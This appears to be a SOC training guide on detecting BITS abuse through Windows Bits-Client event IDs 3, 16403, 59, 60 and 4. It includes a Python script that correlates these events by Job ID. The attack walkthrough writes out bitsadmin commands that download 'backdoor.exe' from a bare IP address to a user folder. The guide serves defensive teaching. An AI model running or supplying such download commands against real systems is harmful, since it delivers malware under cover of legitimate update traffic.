BITS Client Event Log

Introduction

Background Intelligent Transfer Service (BITS) is a legitimate Windows service that transfers files in the background over throttled, resumable connections; Windows Update and many third-party updaters rely on it. Because the transfer is carried out by the BITS service (hosted in svchost.exe) rather than by the process that requested it, jobs survive reboots and the network traffic does not originate from the attacker's tool. Attackers abuse this (MITRE ATT&CK T1197, BITS Jobs) to download malware, exfiltrate data with upload jobs and blend in with legitimate update traffic. This guide shows how BITS is misused and how to detect it through the Bits-Client event log.


Attack Overview: Misusing BITS with Bitsadmin

Attackers can leverage bitsadmin.exe, the built-in command-line BITS client (deprecated in favour of the PowerShell BITS cmdlets, but still shipped with Windows), to create and manage BITS jobs. The PowerShell equivalent, Start-BitsTransfer, drives the same service and writes the same events. Below is a step-by-step example of a download job:

  1. Create a BITS Job:

    bitsadmin /create letsdefend_eventlogs

    This creates a download job named letsdefend_eventlogs. A new job starts in the suspended state and transfers nothing until it is resumed.

  2. Add File Parameters:

    bitsadmin /addfile letsdefend_eventlogs http://172.17.79.137/backdoor.exe C:\Users\letsdefend\documents\file.exe

    • Remote URL: http://172.17.79.137/backdoor.exe

    • Local Path: C:\Users\letsdefend\documents\file.exe

  3. Resume Job:

    bitsadmin /resume letsdefend_eventlogs

    This activates the job and the BITS service begins downloading the file.

  4. Complete Job:

    bitsadmin /complete letsdefend_eventlogs

    Finalizes the job. Until this step the downloaded data sits in a temporary file; /complete renames it to the local path given in step 2 and removes the job from the queue. A job that is never completed stays in the queue (visible with bitsadmin /list /allusers) and can be resumed later.


Analyzing BITS Logs

To detect malicious BITS activity, examine the Bits-Client Operational log, which is enabled by default: Applications and Services Logs > Microsoft > Windows > Bits-Client > Operational (channel name Microsoft-Windows-Bits-Client/Operational for Get-WinEvent and wevtutil). Every job, whether created by bitsadmin.exe, PowerShell or the BITS COM API, is recorded here.


Key Event IDs for Detection

Event ID 3: BITS Job Created

Logs when a BITS job is created (the /create step).

Key Fields:

  • Transfer Job Name: Name of the BITS job.

  • Job ID: GUID assigned to the job. Use it to link the other events in the job's lifecycle, since job names are not unique.

  • Job Owner: User account that created the job. Windows Update jobs are owned by SYSTEM; a job owned by an interactive user deserves a look. On recent Windows 10/11 builds the event also records the path and PID of the process that created the job.

Example Log (Job ID shortened to a placeholder; real values are full GUIDs):

  • Event ID: 3

  • Job Name: letsdefend_eventlogs

  • Job ID: {1234-5678-9101}

  • Job Owner: letsdefend_user

Event ID 16403: BITS Job Parameters Defined

Logs when a job is modified, in this case when /addfile attaches the source and destination to the job. Download jobs and upload jobs both produce this event; for an upload job RemoteName is the exfiltration target.

Key Fields:

  • RemoteName: URL of the file to download/upload.

  • LocalName: Path to store the file locally.

Example Log:

  • RemoteName: http://172.17.79.137/backdoor.exe

  • LocalName: C:\Users\letsdefend\documents\file.exe

Event ID 59: BITS Job Started/Resumed

Logged when BITS starts (or resumes after a pause, reboot or network interruption) transferring a file for the job. The message reads "BITS started the <job name> transfer job that is associated with the <URL> URL", so this is a second place the remote URL appears. One job can produce several 59/60 pairs if the transfer is interrupted and retried.

Key Fields:

  • Job ID: Identifies the job.

  • Job Name and URL: The job and the remote resource being transferred.

  • Byte counters: Total size and bytes transferred so far.

Example Log:

  • Event ID: 59

  • Job ID: {1234-5678-9101}

  • Job Name: letsdefend_eventlogs

  • URL: http://172.17.79.137/backdoor.exe

Event ID 60: BITS Job Stopped

Logged when BITS stops transferring the file, successfully or not. The message ends with "The status code is <HRESULT>".

Key Fields:

  • Job ID, Job Name and URL: Same values as the matching Event ID 59.

  • Status Code: HRESULT for the transfer. 0x0 means the file was fetched; a non-zero value such as 0x80190194 (HTTP 404) means it failed, which is still evidence of an attempt.

Example Log:

  • Event ID: 60

  • Job ID: {1234-5678-9101}

  • Status: 0x0 (Success)

Event ID 4: BITS Job Completed

Logged when the job is completed (the /complete step), which is also the moment the temporary file is renamed to the LocalName from Event ID 16403 and the job leaves the queue. A job that transferred successfully (59/60 with status 0x0) but was never completed shows no Event ID 4 and may be awaiting a later /complete.

Key Fields:

  • Transfer Job Name, Job ID and Owner: Same values as Event ID 3.

  • File Count: Number of files in the job.

Example Log:

  • Event ID: 4

  • Job ID: {1234-5678-9101}

  • File Count: 1


Detecting Malicious BITS Activity

  1. Identify Suspicious Job Names:

    • Malicious jobs may have random or unusual names, or names that imitate update jobs. Treat the name as a weak signal and pivot on the Job ID and owner instead.

  2. Check Remote URLs (Event IDs 16403, 59 and 60):

    • Bare IP addresses, plain HTTP, newly registered or uncategorised domains, and hosts outside your update infrastructure all warrant investigation; check them against threat intelligence.

  3. Track Job Owners:

    • Windows Update and most vendor updaters run as SYSTEM or a service account. A job owned by an interactive user account is not normal update traffic and should be verified with that user.

  4. Monitor File Paths:

    • Look for executables or scripts written to user-writable locations (user profiles, Temp, ProgramData) or to sensitive directories. Legitimate Windows Update downloads land under C:\Windows\SoftwareDistribution\Download.

  5. Correlate Event IDs:

    • Group events by Job ID and track the sequence to confirm the lifecycle of a BITS job:

      • Event ID 3 → Job created.

      • Event ID 16403 → Parameters defined.

      • Event ID 59 → Job started/resumed.

      • Event ID 60 → Job stopped (check the status code).

      • Event ID 4 → Job completed.

    • Events 3 and 16403 alone show intent; 60 with status 0x0 shows the file arrived; 4 shows it was placed at its final path. A job with no Event ID 4 may still be sitting in the queue.

  6. Correlate with Process Creation:

    • Pair the BITS events with process creation logs (Security Event ID 4688 with command-line auditing, or Sysmon Event ID 1) to see who ran bitsadmin.exe or Start-BitsTransfer and with what arguments; the BITS log does not record the command line.
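The correlation described in this section, as an added example that is not part of the original guide: a Python script that groups constructed Bits-Client records by Job ID, rebuilds the lifecycle and flags jobs whose remote host, transport, destination path or owner do not fit update traffic. The record field names (EventID, JobId, JobName, Owner, RemoteName, LocalName, StatusCode, FileCount) follow this page's labels and are an assumption; when reading a real export (wevtutil qe or Get-WinEvent) map the EventData fields onto them. The allowlist of update hosts is also an assumption to tune for your environment.

```python
"""Correlate Bits-Client Operational events by Job ID and flag suspicious jobs.
Added example, not the page's own code. Field names follow the page's labels
(an assumption); map a real wevtutil/Get-WinEvent export onto them first."""
import ipaddress
from collections import OrderedDict
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Lifecycle order from the page: create, add file, start/resume, stop, complete
LIFECYCLE = (3, 16403, 59, 60, 4)
# Assumed allowlist of hosts BITS legitimately talks to; tune for your estate
TRUSTED_SUFFIXES = ("windowsupdate.com", "microsoft.com", "windows.com")
# Extensions that are suspicious as a BITS destination in a user-writable folder
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".scr")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")


@dataclass
class BitsJob:
    job_id: str
    name: str = ""
    owner: str = ""
    remote_names: List[str] = field(default_factory=list)  # from 16403
    local_names: List[str] = field(default_factory=list)   # from 16403
    event_ids: List[int] = field(default_factory=list)     # in the order seen
    status_codes: List[str] = field(default_factory=list)  # from 60
    file_count: Optional[int] = None                       # from 4


def correlate(events):
    """Group records by Job ID (the only stable key; job names are not unique)."""
    jobs = OrderedDict()
    for ev in events:
        job = jobs.setdefault(ev["JobId"], BitsJob(job_id=ev["JobId"]))
        eid = ev["EventID"]
        job.event_ids.append(eid)
        if eid == 3:
            job.name, job.owner = ev.get("JobName", ""), ev.get("Owner", "")
        elif eid == 16403:
            job.remote_names.append(ev.get("RemoteName", ""))
            job.local_names.append(ev.get("LocalName", ""))
        elif eid == 60:
            job.status_codes.append(ev.get("StatusCode", ""))
        elif eid == 4:
            job.file_count = ev.get("FileCount")
    return jobs


def lifecycle_complete(job):
    """True when 3, 16403, 59, 60 and 4 all occur in that relative order."""
    pos = 0
    for eid in job.event_ids:
        if pos < len(LIFECYCLE) and eid == LIFECYCLE[pos]:
            pos += 1
    return pos == len(LIFECYCLE)


def host_reason(url):
    """Reason string if the remote host is a bare IP or off the allowlist."""
    host = (urlparse(url).hostname or "").lower()
    try:
        ipaddress.ip_address(host)
        return f"remote is a bare IP address: {host}"
    except ValueError:
        pass
    if any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES):
        return None
    return f"remote host not in allowlist: {host}"


def assess(job):
    """Return the reasons a job looks suspicious; an empty list means benign."""
    reasons = []
    for url in job.remote_names:
        reason = host_reason(url)
        if reason:
            reasons.append(reason)
        if urlparse(url).scheme == "http":
            reasons.append(f"cleartext HTTP transfer: {url}")
    for path in job.local_names:
        lower = path.lower()
        if lower.endswith(EXEC_EXT) and any(d in lower for d in USER_WRITABLE):
            reasons.append(f"executable written to user-writable path: {path}")
    if reasons and not job.owner.upper().endswith("SYSTEM"):
        reasons.append(f"owner is not SYSTEM: {job.owner}")
    if reasons and lifecycle_complete(job) and all(c == "0x0" for c in job.status_codes):
        reasons.append("lifecycle 3->16403->59->60->4 completed with status 0x0")
    return reasons


def find_suspicious(events):
    """Map Job ID -> reasons for every job that raised at least one reason."""
    return {jid: r for jid, job in correlate(events).items() if (r := assess(job))}


# Constructed sample records: the page's example job plus a benign update-style job
SAMPLE_EVENTS = [
    {"EventID": 3, "JobId": "{1234-5678-9101}", "JobName": "letsdefend_eventlogs",
     "Owner": "letsdefend_user"},
    {"EventID": 16403, "JobId": "{1234-5678-9101}",
     "RemoteName": "http://172.17.79.137/backdoor.exe",
     "LocalName": r"C:\Users\letsdefend\documents\file.exe"},
    {"EventID": 59, "JobId": "{1234-5678-9101}"},
    {"EventID": 60, "JobId": "{1234-5678-9101}", "StatusCode": "0x0"},
    {"EventID": 4, "JobId": "{1234-5678-9101}", "FileCount": 1},
    {"EventID": 3, "JobId": "{aaaa-bbbb-cccc}", "JobName": "WU Client Download",
     "Owner": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 16403, "JobId": "{aaaa-bbbb-cccc}",
     "RemoteName": "https://download.windowsupdate.com/d/msdownload/update/example.cab",
     "LocalName": r"C:\Windows\SoftwareDistribution\Download\example.cab"},
    {"EventID": 59, "JobId": "{aaaa-bbbb-cccc}"},
    {"EventID": 60, "JobId": "{aaaa-bbbb-cccc}", "StatusCode": "0x0"},
    {"EventID": 4, "JobId": "{aaaa-bbbb-cccc}", "FileCount": 1},
]

if __name__ == "__main__":
    for jid, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(jid)
        for r in reasons:
            print("  -", r)
```

Run it directly and only the page's job is reported, with one reason per indicator from the list above plus a final line confirming the full lifecycle ended with status 0x0; the update-style job passes because its host is on the allowlist, it uses HTTPS, the destination is a .cab under SoftwareDistribution and the owner is SYSTEM. The lifecycle check deliberately stays separate from the indicator checks so that a job with events 3 and 16403 only (intent without a completed transfer) is still flagged.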


Key Points

By grouping Event IDs 3, 16403, 59, 60 and 4 on the Job ID, SOC analysts can reconstruct every BITS job on a host and investigate the ones whose owner, remote URL or local path do not fit normal update activity. These logs are crucial for detecting:

  • Data exfiltration (upload jobs)

  • Malware delivery

  • Unauthorized file transfers

Forwarding the Bits-Client Operational log to the SIEM and alerting on the indicators above gives early detection of a technique that otherwise hides inside legitimate service traffic.
